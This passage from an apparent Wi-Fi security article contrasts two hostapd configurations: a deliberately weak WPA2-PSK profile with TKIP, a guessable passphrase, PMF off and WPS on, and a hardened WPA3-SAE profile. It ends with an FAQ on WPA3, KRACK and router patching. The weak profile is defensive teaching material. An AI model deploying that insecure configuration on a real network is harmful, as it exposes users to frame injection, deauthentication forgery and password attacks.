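The router-hardening advice in the business and home checklists above, as an added example that is not from the page or any vendor: two hostapd configurations, the kind of weak profile many routers still ship beside a hardened WPA3-Personal profile. The interface name, SSID and passphrases are placeholders; everything else uses real hostapd.conf options.

```ini
# --- Weak (what many home routers ship): WPA2-PSK, TKIP allowed, PMF off, WPS on
interface=wlan0
ssid=HomeNet
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=TKIP CCMP        # TKIP lets a KRACK attacker inject frames, not just decrypt
wpa_passphrase=password123    # guessable with the offline attack described earlier
ieee80211w=0                  # no Protected Management Frames: deauth frames can be forged
wps_state=2                   # WPS enabled and configured; its PIN method can be brute-forced

# --- Hardened: WPA3-Personal only, AES-CCMP only, PMF required, WPS off
interface=wlan0
ssid=HomeNet
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
sae_password=CHANGE-ME-to-a-long-random-passphrase
sae_pwe=2                     # hash-to-element PWE derivation (hostapd 2.10 or newer)
ieee80211w=2                  # PMF required
sae_require_mfp=1
wps_state=0

# --- Transition mode, only while legacy clients remain (replace the two lines in the hardened block):
# wpa_key_mgmt=WPA-PSK SAE
# ieee80211w=1                # PMF optional so WPA2 clients can still join; SAE clients still require it
```

In transition mode `wpa_passphrase=` serves WPA2 clients and `sae_password=` serves WPA3 clients; the network is only as strong as the WPA2 side until the last legacy client is retired, so plan to drop `WPA-PSK` from `wpa_key_mgmt` rather than leave the mixed mode in place indefinitely.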
Do I need WPA3?
It is better to be safe than sorry, so yes, you do.
Changing your WPA2 password will not protect you against a KRACK attack which focuses on key management. However, it makes security sense to always choose strong passwords.
But, is WPA3 enough?
John Wu, in an article on LinkedIn, says WPA3 is not enough to ensure total wi-fi security because hackers use other methods to attack wi-fi networks. "The recent VPNFilter virus doesn't take advantage of any of the WPA2 shortcomings. Instead, the attack is targeting known vulnerabilities in the WiFi routers' web interface, remote ports that are open with hard-coded passwords, software that is not updated, and vulnerable connected IoT devices."
The solution? Use the checklists above on how to protect your wi-fi connections as a guide to creating a layered approach to wi-fi security. Top of the list? Stay up-to-date with patches.